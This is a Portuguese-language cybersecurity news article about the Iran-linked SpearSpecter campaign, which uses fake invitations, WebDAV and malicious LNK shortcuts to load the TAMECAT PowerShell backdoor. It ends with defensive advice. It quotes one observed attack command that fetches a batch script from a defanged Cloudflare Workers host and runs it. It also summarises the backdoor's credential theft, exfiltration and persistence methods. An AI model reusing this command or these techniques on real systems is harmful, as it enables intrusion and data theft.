Hack Alerta

SpearSpecter: operação iraniana usa convite falso e WebDAV para implantar backdoor TAMECAT

Por Redação Hack Alerta Publicado em 17/11/2025 10:02 Cyber ataques Tempo de leitura: 3 min

A campanha SpearSpecter usa convites falsos e WebDAV para distribuir um atalho malicioso que carrega o backdoor PowerShell TAMECAT. O malware coleta senhas, tira screenshots frequentes e exfiltra dados em blocos de 5 MB; alvos são altos funcionários e familiares.

Uma campanha de espionagem de longo prazo direciona altos funcionários governamentais e militares usando convites falsos e contatos personalizados por WhatsApp para ganhar confiança antes do ataque.

Como funciona o acesso inicial

Os operadores enviam links que apontam a arquivos hospedados em OneDrive. Ao clicar, a exploração do protocolo search-ms do Windows pode abrir um prompt pedindo para abrir o Windows Explorer; se o usuário confirmar, o sistema conecta-se a um servidor WebDAV controlado pelo atacante.

Arquivo malicioso e execução

O servidor WebDAV apresenta o que parece ser um PDF, mas na verdade é um atalho malicioso (LNK). Ao abrir esse item, o atalho executa comandos ocultos que baixam um script em lote hospedado em plataformas como Cloudflare Workers. O comando de exemplo observado é:

cmd / c curl --ssl-no-revoke -o vgh.txt hxxps://line.completely.workers.dev/aoh5 & rename vgh.txt temp.bat & %tmp%

TAMECAT: capacidades do backdoor

O script carrega o TAMECAT, um backdoor PowerShell que roda inteiramente em memória. TAMECAT usa AES-256 para comunicação com servidores de comando por múltiplos canais (tráfego web, Telegram, Discord) e implementa funcionalidades de roubo de credenciais e coleta contínua de dados.

  • Coleta de senhas de navegador: abre Microsoft Edge com remote debugging e suspende processos do Chrome para extrair credenciais;
  • Captura de tela a cada quinze segundos e busca por documentos relevantes;
  • Fragmentação e exfiltração: dados são divididos em blocos de 5 MB para upload ao C2;
  • Mecanismos de persistência: criação de entradas de registro que executam scripts em lote no login.

Alvo e objetivo

A campanha mira altos funcionários e seus familiares para maximizar pressão e pontos de acesso. O objetivo declarado pelas análises é a exfiltração de informações sensíveis e a manutenção de acesso furtivo por longos períodos, típico de operações de espionagem.

Limitações conhecidas

As avaliações indicam que a operação persiste há meses, mas as fontes não apresentam um número público de vítimas nem uma lista completa de indicadores de comprometimento. Também não há, nas informações analisadas, detalhes sobre atribuição técnica além do vínculo apontado aos grupos associados à inteligência iraniana.

Recomendações práticas

Equipes de defesa devem orientar alvos de alto risco sobre mensagens e convites aparentemente legítimos, restringir a execução automática de atalhos vindos de WebDAV/OneDrive, e monitorar eventos de criação de processos curl/cmd, execução de scripts em lote, e conexões inusuais para serviços como Telegram/Discord a partir de estações sensíveis. Ferramentas EDR que detectam carregamento em memória e comportamento de fragmentação/exfiltração auxiliam na detecção precoce.

Baseado em publicação original de Cyber Security News
Tags: #spearspecter #tamecat #webdav #lnk #powerShell #espionagem #onedrive #exfiltration #credentials
Publicado pela Redação Hack Alerta com base em fontes externas citadas e monitoramento editorial do Hack Alerta. Para decisões técnicas, operacionais ou jurídicas, confirme sempre os detalhes na fonte original.
← Voltar